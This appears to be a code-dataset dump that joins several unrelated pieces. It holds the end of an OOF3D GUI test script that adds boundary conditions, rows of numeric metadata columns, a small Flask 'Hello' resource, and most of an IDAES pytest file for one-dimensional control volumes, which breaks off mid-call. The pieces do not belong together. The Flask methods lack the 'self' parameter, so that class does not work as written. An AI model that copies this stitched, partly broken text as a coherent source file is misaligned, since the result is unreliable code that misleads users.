findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax', 'floating_constantXmaxYmax', 'floating_constantXmaxYmaxZmax', 'floating_constantXmaxYmaxZmin', 'floating_constantXmaxYmin', 'floating_constantXmaxYminZmax', 'floating_constantXmaxYminZmin', 'floating_constantXmaxZmax', 'floating_constantXmaxZmin', 'floating_constantXmin', 'floating_constantXminYmax', 'floating_constantXminYmaxZmax', 'floating_constantXminYmaxZmin', 'floating_constantXminYmin', 'floating_constantXminYminZmax', 'floating_constantXminYminZmin', 'floating_constantXminZmax', 'floating_constantXminZmin', 'floating_constantYmax', 'floating_constantYmaxZmax', 'floating_constantYmaxZmin', 'floating_constantYmin', 'floating_constantYminZmax', 'floating_constantYminZmin', 'floating_constantZmax', 'floating_constantZmin', 'floating_continiumXmax', 'floating_continuumXmaxYmax', 'floating_continuumXmaxYmaxZmax', 'floating_continuumXmaxYmaxZmin', 'floating_continuumXmaxYmin', 'floating_continuumXmaxYminZmax', 'floating_continuumXmaxYminZmin', 'floating_continuumXmaxZmax', 'floating_continuumXmaxZmin', 'floating_continuumXmin', 'floating_continuumXminYmax', 'floating_continuumXminYmaxZmax', 'floating_continuumXminYmaxZmin', 'floating_continuumXminYmin', 'floating_continuumXminYminZmax', 'floating_continuumXminYminZmin', 'floating_continuumXminZmax', 'floating_continuumXminZmin', 'floating_continuumYmax', 'floating_continuumYmaxZmax', 'floating_continuumYmaxZmin', 'floating_continuumYmin', 'floating_continuumYminZmax', 'floating_continuumYminZmin', 'floating_continuumZmax', 'floating_continuumZmin'])
findMenu(findWidget('OOF3D:MenuBar'), 'File:Save:Python_Log').activate()
checkpoint toplevel widget mapped Dialog-Python_Log
findWidget('Dialog-Python_Log').resize(190, 92)
findWidget('Dialog-Python_Log:filename').set_text('bcpage.log')
findWidget('Dialog-Python_Log:gtk-ok').clicked()
checkpoint OOF.File.Save.Python_Log
assert tests.filediff('bcpage.log')
widget_2=findWidget('OOF3D')
handled_2=widget_2.event(event(gtk.gdk.DELETE,window=widget_2.window))
postpone if not handled_2: widget_2.destroy()
checkpoint OOF.Graphics_1.File.Close
| 51.592334
| 1,587
| 0.842591
| 7,146
| 59,228
| 6.950742
| 0.035264
| 0.168311
| 0.186028
| 0.163841
| 0.925287
| 0.917073
| 0.910026
| 0.906624
| 0.903684
| 0.899779
| 0
| 0.018899
| 0.079844
| 59,228
| 1,147
| 1,588
| 51.637315
| 0.892493
| 0.00883
| 0
| 0.884378
| 0
| 0
| 0.318942
| 0.105701
| 0
| 0
| 0
| 0
| 0.00353
| 0
| null | null | 0
| 0.000883
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6009f744708202d32c62af83a116f57632df0a81
| 178
|
py
|
Python
|
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | null | null | null |
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | 2
|
2020-01-28T13:23:58.000Z
|
2020-01-28T13:26:04.000Z
|
resources/Hello.py
|
ruanpato/flaskRestfulAPI
|
1c9611a00ccdfcb519e3378a112c28d3e4f8dcce
|
[
"MIT"
] | 2
|
2020-01-28T13:23:25.000Z
|
2020-01-28T14:32:22.000Z
|
from flask_restful import Resource
class Hello(Resource):
def get():
return {"message": "Hello, World!"}
def post():
return {"message": "Hello, World!"}
| 22.25
| 43
| 0.606742
| 20
| 178
| 5.35
| 0.65
| 0.242991
| 0.336449
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241573
| 178
| 8
| 44
| 22.25
| 0.792593
| 0
| 0
| 0.333333
| 0
| 0
| 0.223464
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
60210011a8666b59f5803940b9ea510ff7afa5e7
| 120,171
|
py
|
Python
|
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
idaes/core/tests/test_control_volume_1d.py
|
dangunter/idaes-pse
|
8f63b4ad8000af8a3eb0316a5f61c32e206925d0
|
[
"RSA-MD"
] | null | null | null |
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for ControlVolumeBlockData.
Author: Andrew Lee
"""
import pytest
from pyomo.environ import (ConcreteModel, Constraint, Expression,
Set, units, Var)
from pyomo.util.check_units import assert_units_consistent
from pyomo.dae import ContinuousSet, DerivativeVar
from pyomo.common.config import ConfigBlock
from pyomo.core.base.constraint import _GeneralConstraintData
from idaes.core import (ControlVolume1DBlock,
FlowsheetBlockData,
declare_process_block_class,
FlowDirection,
MaterialBalanceType,
EnergyBalanceType)
from idaes.core.control_volume1d import ControlVolume1DBlockData
from idaes.core.util.exceptions import (BalanceTypeNotSupportedError,
ConfigurationError,
PropertyNotSupportedError)
from idaes.core.control_volume1d import DistributedVars
from idaes.core.util.testing import (PhysicalParameterTestBlock,
ReactionParameterTestBlock)
import idaes.logger as idaeslog
# -----------------------------------------------------------------------------
# Mockup classes for testing
@declare_process_block_class("Flowsheet")
class _Flowsheet(FlowsheetBlockData):
def build(self):
super(_Flowsheet, self).build()
@declare_process_block_class("CVFrame")
class CVFrameData(ControlVolume1DBlockData):
def build(self):
super(ControlVolume1DBlockData, self).build()
# -----------------------------------------------------------------------------
# Test DistributedVars Enum
@pytest.mark.unit
def test_DistributedVars():
assert len(DistributedVars) == 2
# -----------------------------------------------------------------------------
# Basic tests
@pytest.mark.unit
def test_base_build():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = CVFrame(default={"property_package": m.fs.pp})
assert len(m.fs.cv.config) == 12
assert m.fs.cv.config.dynamic is False
assert m.fs.cv.config.has_holdup is False
assert m.fs.cv.config.property_package == m.fs.pp
assert isinstance(m.fs.cv.config.property_package_args, ConfigBlock)
assert len(m.fs.cv.config.property_package_args) == 0
assert m.fs.cv.config.reaction_package is None
assert isinstance(m.fs.cv.config.reaction_package_args, ConfigBlock)
assert len(m.fs.cv.config.reaction_package_args) == 0
assert m.fs.cv.config.auto_construct is False
assert m.fs.cv.config.area_definition == DistributedVars.uniform
assert m.fs.cv.config.transformation_method is None
assert m.fs.cv.config.transformation_scheme is None
assert m.fs.cv.config.finite_elements is None
assert m.fs.cv.config.collocation_points is None
@pytest.mark.unit
def test_validate_config_args_transformation_method_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={"property_package": m.fs.pp})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_1():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "LAGRANGE-RADAU"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_2():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "LAGRANGE-LEGENDRE"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_3():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "BACKWARD"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_4():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "FORWARD"})
# -----------------------------------------------------------------------------
# Test add_geometry
@pytest.mark.unit
def test_add_geometry_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
assert isinstance(m.fs.cv.length_domain, ContinuousSet)
assert len(m.fs.cv.length_domain) == 2
assert isinstance(m.fs.cv.area, Var)
assert len(m.fs.cv.area) == 1.0
assert m.fs.cv.area.value == 1.0
assert isinstance(m.fs.cv.length, Var)
assert len(m.fs.cv.length) == 1.0
assert m.fs.cv.length.value == 1.0
assert m.fs.cv._flow_direction == FlowDirection.forward
@pytest.mark.unit
def test_add_geometry_inherited_domain():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.domain = ContinuousSet(bounds=(0, 1))
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(length_domain=m.fs.domain)
assert m.fs.cv.length_domain == m.fs.domain
@pytest.mark.unit
def test_add_geometry_length_domain_set():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(length_domain_set=[0.0, 0.2, 0.7, 1.0])
assert len(m.fs.cv.length_domain) == 4
for p in m.fs.cv.length_domain:
assert p in [0.0, 0.2, 0.7, 1.0]
@pytest.mark.unit
def test_add_geometry_flow_direction():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(flow_direction=FlowDirection.backward)
assert m.fs.cv._flow_direction == FlowDirection.backward
@pytest.mark.unit
def test_add_geometry_flow_direction_invalid():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
with pytest.raises(ConfigurationError):
m.fs.cv.add_geometry(flow_direction="foo")
@pytest.mark.unit
def test_add_geometry_discretized_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
assert len(m.fs.cv.area) == 2
# -----------------------------------------------------------------------------
# Test apply_transformation
@pytest.mark.unit
def test_apply_transformation_finite_elements_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry()
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
@pytest.mark.unit
def test_apply_transformation_collocation_points_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-RADAU",
"finite_elements": 10})
m.fs.cv.add_geometry()
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
@pytest.mark.unit
def test_apply_transformation_BFD_10():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 11
@pytest.mark.unit
def test_apply_transformation_FFD_12():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 12})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 13
@pytest.mark.unit
def test_apply_transformation_Lagrange_Radau_8_3():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-RADAU",
"finite_elements": 8,
"collocation_points": 3})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 25
@pytest.mark.unit
def test_apply_transformation_Lagrange_Legendre_3_7():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-LEGENDRE",
"finite_elements": 9,
"collocation_points": 4})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 46
@pytest.mark.unit
def test_apply_transformation_external_domain():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.cset = ContinuousSet(bounds=(0, 1))
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry(length_domain=m.fs.cset)
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
# -----------------------------------------------------------------------------
# Test add_state_blocks
@pytest.mark.unit
def test_add_state_blocks():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
assert hasattr(m.fs.cv, "properties")
assert len(m.fs.cv.properties) == 2
for x in m.fs.cv.length_domain:
assert len(m.fs.cv.properties[0, x].config) == 3
if x == 0:
assert m.fs.cv.properties[0, x].config.defined_state is True
else:
assert m.fs.cv.properties[0, x].config.defined_state is False
assert m.fs.cv.properties[0, x].config.has_phase_equilibrium is False
assert m.fs.cv.properties[0, x].config.parameters == m.fs.pp
@pytest.mark.unit
def test_add_state_block_forward_flow():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(information_flow=FlowDirection.forward,
has_phase_equilibrium=False)
assert m.fs.cv.properties[0, 0].config.defined_state is True
assert m.fs.cv.properties[0, 1].config.defined_state is False
@pytest.mark.unit
def test_add_state_block_backward_flow():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(information_flow=FlowDirection.backward,
has_phase_equilibrium=False)
assert m.fs.cv.properties[0, 0].config.defined_state is False
assert m.fs.cv.properties[0, 1].config.defined_state is True
@pytest.mark.unit
def test_add_state_blocks_has_phase_equilibrium():
    """has_phase_equilibrium=True is propagated to every state block config."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)

    for x in m.fs.cv.length_domain:
        assert m.fs.cv.properties[0, x].config.has_phase_equilibrium is True
@pytest.mark.unit
def test_add_state_blocks_no_has_phase_equilibrium():
    """Omitting the has_phase_equilibrium argument raises ConfigurationError."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    cv_config = {
        "property_package": model.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    model.fs.cv = ControlVolume1DBlock(default=cv_config)
    model.fs.cv.add_geometry()

    with pytest.raises(ConfigurationError):
        model.fs.cv.add_state_blocks()
@pytest.mark.unit
def test_add_state_blocks_custom_args():
    """property_package_args entries appear as extra keys in each state
    block's config (3 standard entries + 1 custom = 4)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "property_package_args": {"test": "test"}})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    for x in m.fs.cv.length_domain:
        assert len(m.fs.cv.properties[0, x].config) == 4
        assert m.fs.cv.properties[0, x].config.test == "test"
# -----------------------------------------------------------------------------
# Test add_reaction_blocks
@pytest.mark.unit
def test_add_reaction_blocks():
    """add_reaction_blocks builds a 'reactions' block per (time, x) point,
    wired to the corresponding state block and reaction parameter block."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    assert hasattr(m.fs.cv, "reactions")
    assert len(m.fs.cv.reactions) == 2
    assert len(m.fs.cv.reactions[0, 0].config) == 3
    assert m.fs.cv.reactions[0, 0].config.state_block == m.fs.cv.properties
    # state_ref points at the state block at the same (t, x) index
    assert m.fs.cv.reactions[0, 0].state_ref == m.fs.cv.properties[0, 0]
    assert m.fs.cv.reactions[0, 0].config.has_equilibrium is False
    assert m.fs.cv.reactions[0, 0].config.parameters == m.fs.rp
@pytest.mark.unit
def test_add_reaction_blocks_has_equilibrium():
    """has_equilibrium=True is propagated to the reaction block config."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    cv_config = {
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    model.fs.cv = ControlVolume1DBlock(default=cv_config)

    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    model.fs.cv.add_reaction_blocks(has_equilibrium=True)

    assert model.fs.cv.reactions[0, 0].config.has_equilibrium is True
@pytest.mark.unit
def test_add_reaction_blocks_no_has_equilibrium():
    """Omitting the has_equilibrium argument raises ConfigurationError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_reaction_blocks()
@pytest.mark.unit
def test_add_reaction_blocks_custom_args():
    """reaction_package_args entries appear as extra keys in the reaction
    block's config."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
